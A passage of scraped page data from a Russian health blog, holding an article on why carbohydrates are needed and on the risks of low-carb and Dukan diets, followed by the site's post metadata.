src=\"http://mtdata.ru/u28/photo52F0/20359515713-0/original.jpg#20359515713\" alt=\"© <a href=\" />\x3c/div>\n\x3cblockquote>\n\x3cp>\x3cem>В наш век растущей моды на здоровое питание и низкоуглеводные диеты старые-добрые углеводы теряют популярность куда быстрее, чем вычеркнувшие их из рациона страстные борцы с лишним весом — свои килограммы. Однако всё, как водится, не так просто и очевидно: углеводы, безусловно, следует кушать, а вот почему и как — ниже рассказывает эксперт в области ЗОЖ.\x3c/em>\x3c/p>\n\x3c/blockquote>\n\x3cp>\x3cstrong>Почему-то люди решили объявить войну углеводам. Нас пугает всеобщая «белкомания», поэтому давайте узнаем, что такое углеводы и еще раз обсудим принципы правильного питания.\x3c/strong>\x3c/p>\n\x3ch2>Что это?\x3c/h2>\n\x3cp>С точки зрения химии углеводы — это класс органических веществ, в состав которых входит углерод, кислород и водород. В организме их всего примерно 2–3%, которые откладываются в виде гликогена (грубо говоря, оперативный запас энергии). 5–6% от общей массы печени, до 0,5% сердца и 2–3% скелетных мышц — это углеводы.\x3c/p>\n\x3cp>В теле 70-килограмового мужчины примерно 500 г гликогена, но кроме него есть еще глюкоза, которая в свободном виде «плавает» в крови. Её совсем мало — примерно 5 граммов. Чем более человек тренированный, тем больше гликогена он может запасать.\x3c/p>\n\x3cp>Тело человека может синтезировать углеводы, но в незначительном количестве, поэтому основное количество углеводов поступает в организм с пищей. Углеводы находятся преимущественно в продуктах растительного происхождения. Например, в злаках их содержится около 80% от общей сухой массы. И к примеру сахар — это вообще на 99,98% углевод.\x3c/p>\n\x3ch2>Для чего они?\x3c/h2>\n\x3cp>У углеводов есть свои задачи:\x3c/p>\n\x3cp>\x3cstrong>Энергетическая:\x3c/strong> углеводы обеспечивают 50–60% суточного энергопотребления организма. При окислении 1 г углеводов выделяется 17 кДж энергии или более привычные нам 4,1 ккал и 0,4 г воды. Поэтому когда вы перестаете есть углеводы, вас сначала «сливает», то есть из вас выходит запасенная ранее вода. Этот процесс многие ошибочно принимают за истинное жиросжигание, в то время как всего лишь истощаются запасы гликогена.\x3c/p>\n\x3cp>Основной источник энергии для нас — это запасенный в печени и мышцах гликоген и свободная глюкоза в крови, которые образовались из съеденных углеводов.\x3c/p>\n\x3cp>\x3cstrong>Пластическая или строительная:\x3c/strong> из углеводов «строятся» некоторые ферменты, клеточные мембраны, они также входят в состав полисахаридов и сложных белков хрящевой, костной и других тканей. Углеводы хранятся в виде запаса питательных веществ, а также входят в состав сложных молекул (например, рибозы и дезоксирибозы) участвуют в построении универсального источника энергии АТФ, «хранилища» генетической информации ДНК и макромолекулы, содержащейся в клетках — РНК.\x3c/p>\n\x3cp>\x3cstrong>Специфическая:\x3c/strong> углеводы к примеру, выполняют роль антикоагулянтов, то есть делают так, чтобы кровь не сворачивалась в самый неподходящий момент. Являются рецепторами ряда гормонов или фармакологических веществ-то есть помогают гормонам распознать где и в каком количестве они нужны. Так же они оказывают противоопухолевое действие.\x3c/p>\n\x3cp>\x3cstrong>Запас питательных веществ:\x3c/strong> углеводы накапливаются в скелетных мышцах, печени, сердце и некоторых других тканях в виде гликогена. Гликоген — это быстромобилизуемый энергетический резерв. Функция гликогена печени — обеспечивать глюкозой весь организм, функции гликогена в мышцах — обеспечивать энергией физическую активность.\x3c/p>\n\x3cp>\x3cstrong>Защитная:\x3c/strong> сложные углеводы входят в состав компонентов иммунной системы. Мукополисахариды находятся в слизистых веществах, которые покрывают поверхность сосудов носа, бронхов, пищеварительного тракта, мочеполовых путей и защищают от проникновения бактерий и вирусов, а также от механических повреждений.\x3c/p>\n\x3cp>\x3cstrong>Регуляторная:\x3c/strong> клетчатка пищи не поддается процессу расщепления в кишечнике, однако активирует перистальтику кишечного тракта, ферменты, использующиеся в пищеварительном тракте, улучшая пищеварение и усвоение питательных веществ.\x3c/p>\n\x3ch2>Какие они бывают?\x3c/h2>\n\x3cdiv>\x3cimg src=\"http://mtdata.ru/u28/photo2D63/20136442864-0/original.jpg#20136442864\" alt=\"© <a href=\" />\x3cbr />\n\x3cp>Хлеб, крупы, макароны, овощи, фрукты, сахар — это все продукты растительного происхождения, которые состоят преимущественно из углеводов или моно-, ди- и полисахаридов.\x3c/p>\n\x3c/div>\n\x3cp>\x3cstrong>Моносахариды:\x3c/strong> это простые углеводы, которые не распадаются под воздействием пищеварительных ферментов. Глюкоза и фруктоза — это моносахарид, которые содержатся во многих фруктах, соках, меде и называются сахарами. В организм они поступают как сами по себе, если вы, например, съели ложку сахара или же образуются в процессе пищеварения из более сложных углеводов.\x3c/p>\n\x3cp>Как только в организме оказывается много свободной глюкозы, активизируется поджелудочная железа, которая выделяет гормон инсулин, благодаря которому глюкоза перенаправляется в ткани, где она используется для синтеза гликогена, а при значительном избытке — и для синтеза жиров (вот он эффект от лишних тортиков и злоупотребления фруктовыми соками!) Чтобы моносахариды были нам друзьями, а не врагами, их количество в питании не должно превышать 25–35% общего количества съеденных за сутки углеводов.\x3c/p>\n\x3cp>Грубо говоря, на каждые 2 чайные ложки сахара (моносахариды или простые углеводы) надо употреблять 100 граммов овсянки (сложные углеводы).\x3c/p>\n\x3cp>Нынче очень модно заменять глюкозу фруктозой под эгидой, что — это якобы более полезно и она не запасается в виде жира. Это неправда: глюкоза и фруктоза — родные братья. Их различает только то, что у глюкоза содержит альдегидную функциональную группу, а фруктоза — кетогруппу.\x3c/p>\n\x3cp>\x3cstrong>Дисахариды:\x3c/strong> это составная часть олигосахаридов, которая состоит из 2–10 моносахаридов. Основные дисахариды — это сахароза (обычный столовый сахар), состоящая из остатков глюкозы и фруктозы, мальтоза (солодовые экстракты злаковых, проросшие зерна) или два соединенных между собой остатка глюкозы, лактоза (молочный сахар) имеющая в своем составе остаток глюкозы и галактозы. Все дисахариды имеют сладковатый вкус.\x3c/p>\n\x3cp>\x3cstrong>Полисахариды:\x3c/strong> это сложные углеводы, состоящие из многих сотен или тысяч связанных между собой моносахаридов. Этот вид углеводов содержится в крахмале (картофель, крупы, хлеб, рис и др.), в «животном крахмале» — гликогене, в пищевая клетчатка и пектин (фрукты, овощи, злаки, бобовые, отруби и др.) и легкоусвояемом инулине (топинамбур, корень цикория, лук, чеснок, бананы, ячмень, рожь).\x3c/p>\n\x3ch2>Сколько нужно углеводов?\x3c/h2>\n\x3cp>ВОЗ и РАМН рекомендует есть по 4 г углеводов на каждый кг массы тела. То есть для девушки весом 60 кг нужно съедать 240 г углеводов. Это примерно 360 г отваренного круглого риса, или 1,5 кг варёной картошки, или 2,6 кг сладких яблок, или 12 кг сельдерея.\x3c/p>\n\x3cp>4 г на каждый кг веса — это рекомендации для малоактивных людей. Для незначительно умеренно активных норма 5-6г, для умеренно активных (например, 3 силовых тренировки в неделю по часу) — 6–7 г. Спортсменам же рекомендуют есть не менее 8–10 г углеводов на каждый кг их мускулистого тела.\x3c/p>\n\x3ch2>А что если без них? Риски белковых (безуглеводных) диет\x3c/h2>\n\x3cp>Да, люди — белковая форма жизни, которая может существовать и без употребления углеводов в пищу, но это нездорово, безграмотно и в перспективе нанесет вред здоровью. Потому что уменьшение содержания углеводов в пище усиливает распад клеточных белков, окисление жиров и образование кетоновых тел, что может привести к ацидозу, то есть увеличить кислотность в организме.\x3c/p>\n\x3cp>Обычно продукты окисления органических кислот быстро удаляются из организма, но при голодании или низкоуглеводной диете, они задерживаются в организме, что в лучшем случае приведет к появлению в моче ацетоуксусной кислоты и ацетона, а в тяжёлых может привести к коме (такое случается с диабетиками).\x3c/p>\n\x3cdiv>\x3cimg src=\"http://mtdata.ru/u29/photo4590/20582588562-0/original.jpg#20582588562\" alt=\"Пьер Дюкан / © <a href=\" />\x3cbr />\n\x3cp>\x3cem>Пьер Дюкан\x3c/em>\x3c/p>\n\x3cp>У «дюкановцев» случается метаболический ацидоз — при недостатке углеводов в тканях накапливаются кислые продукты, то есть возникает кето- или лактоацидоз.\x3c/p>\n\x3c/div>\n\x3cp>Кетоацидоз возникает вследствие дефицита инсулина. Когда вы едите критически мало углеводов (менее 2 г на кг тела) довольно продолжительное время, то организм подпитывает себя энергией за счет гликогена и запасённых жиров. Мозг же получает энергию в основном утилизируя глюкозу и ацетон для него является токсичным веществом. Непосредственное расщепление жиров не может обеспечить необходимой энергией головной мозг, а так как запасы гликогена относительно невелики (500 г) и истощаются в течение первых дней после отказа от углеводов, то организм может обеспечить мозг энергией либо с помощью глюконеогенеза (внутреннего синтеза глюкозы), либо путём повышения концентрации кетоновых тел в крови для переключения других тканей и органов на альтернативный источник энергии.\x3c/p>\n\x3cp>В норме при дефиците углеводистой пищи печень из ацетил-КоА синтезирует кетоновые тела — возникает кетоз, не вызывающий электролитных нарушений (является вариантом нормы). Однако в ряде бескомпромиссных случаев также возможна декомпенсация и развитие ацидоза и может привести к диабетической кетоацидотической коме.\x3c/p>\n\x3cp>Жиры при низкоуглеводных диетах сжигаются хуже, чем при нормальном, сбалансированном питании, так как обычно жиры соединяются с углеводами для последующего преобразования в энергию, а при недостатке углеводов происходит неполноценное сжигание жиров, и образуется побочный продукт — кетоны, которые накапливаются в крови и моче, что вызывает кетоз. Кетоз приводит к снижению аппетита (организм думает, что он на грани выживания), снижается работоспособность, вялость, усталость и раздражительность становятся нормой.\x3c/p>\n\x3ch3>Перебор с углеводами\x3c/h3>\n\x3cp>Систематический перебор с углеводами приводит к преобладанию процессов брожения в кишечнике, а также ожирению, атеросклерозу, сахарному диабету второго типа, так как часть углеводов превращается в жиры и холестерин, которые лежат мёртвым грузом на внутренних органах, поверх наших красивых мышц и всячески вредят кровеносной системе.\x3c/p>\n\x3cp>Для того, чтобы быть здоровым на самом деле нужно уметь удовлетворять потребности организма таким образом, чтобы было хорошо всему телу в целом, при этом оставаясь в нормальных здоровых рамках. Важно чтобы все органы чувств (в том числе и ваш мозг) радовались еде, чтобы принятие пищи доставляло положительные эмоции.\x3c/p>\n\x3cp>\x3ca href=\"http://www.zozhnik.ru/2014/02/26/%D0%B7%D0%B0%D1%87%D0%B5%D0%BC-%D0%B5%D1%81%D1%82%D1%8C-%D1%83%D0%B3%D0%BB%D0%B5%D0%B2%D0%BE%D0%B4%D1%8B/\" target=\"_blank\">Источник\x3c/a>\x3c/p>","comments_count":1,"marks_count":6,"likes":{"count":6,"user_likes":0,"can_like":0,"marks_pluses":6,"marks_minuses":0,"user_like_attr":null,"like_attr_ids":[{"id":100,"count":6}]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://s30669388060.mirtesen.ru/blog/43252000747","tags":["диеты","Обсуждение с сообществом","Дюкан","баланс веществ","главное","красота","похудение","болезни","здоровье","еда","углеводы","правильное питание","белки"],"date":1417089113,"canEdit":false,"foreignPollId":null,"attachments":[{"photo":{"id":20359515713,"photo_original":"https://mtdata.ru/u28/photo52F0/20359515713-0/original.jpg","width":620,"height":418}}],"group":{"display_name":"ПолонСил.ру - социальная сеть здоровья","url":"https://s30669388060.mirtesen.ru","photo_original":"//mtdata.ru/u20/photo2B7E/20125696275-0/original.jpeg","id":30669388060,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1354869995507},"canonical_url":"https://s30669388060.mirtesen.ru/blog/43252000747","topic":"health","title":"Зачем есть углеводы и чем опасны низкоуглеводные диеты","preview_text":"Углеводы, безусловно, следует употреблять, а вот почему и как — разбираемся ниже \n\nВ наш век растущей моды на здоровое питание и низкоуглеводные диеты старые-добрые углеводы теряют популярность куда быстрее, чем вычеркнувшие их из рациона страстные борцы с лишним весом — свои килограммы. Однако","post_type":"post","formattedDates":{"iso":"2014-11-27T11:51:53.000Z","ver1":"27 ноября, 14:51","ver2":"27.11.2014 в 14:51","ver3":"27 нояб., 14:51"},"images":[{"main":true,"url":"https://mtdata.ru/u28/photo52F0/20359515713-0/original.jpg","width":620,"height":418}],"videos":[],"shared_post":null,"mentionedPersons":null}],"tag":"Дюкан","tagId":80265984852,"hasMore":true,"offset":1,"isGeo":false},"reasonsForShowing":{},"channelMain":{"items":[],"nextOffset":0,"hasMoreItems":true,"currentUserPostId":null,"page":0},"richPostEditor":{"id":null,"title":"","text":"","channel":null,"canSelectChannel":false,"canSubmit":false},"indexChannel":{"items":[],"nextOffset":0,"hasMoreItems":true},"videoList":{},"videoOne":{},"videoRecommendations":{},"channelActions":{},"testDraftJs":{},"channelEditor":{"tab":"info","isOpen":false,"isLoading":false,"info":{"id":null,"name":"","title":"","description":"","isNameAvailable":true,"errors":{}},"telegramEdit":{"name":"","tags":[],"errors":{}}},"channelCoverEditor":{"isOpen":false,"mode":"add","imageSaved":false},"channelAvatarEditor":{"isOpen":false},"myChannels":{"channels":[],"subscriptions":{"items":[],"nextOffset":0,"hasMore":true,"subscriptionsNum":0}},"channelHeaderTags":{"isOpen":false,"searchResults":[],"geoTags":[],"tags":[],"searchInProccess":false,"geoPosition":null,"headerTags":[]},"searchResults":{"query":"","activeTab":"posts","isLoading":false,"posts":{"results":[],"page":0,"hasMore":true},"geo":{"results":[],"page":0,"hasMore":true},"channels":{"results":[],"page":0,"hasMore":true}}}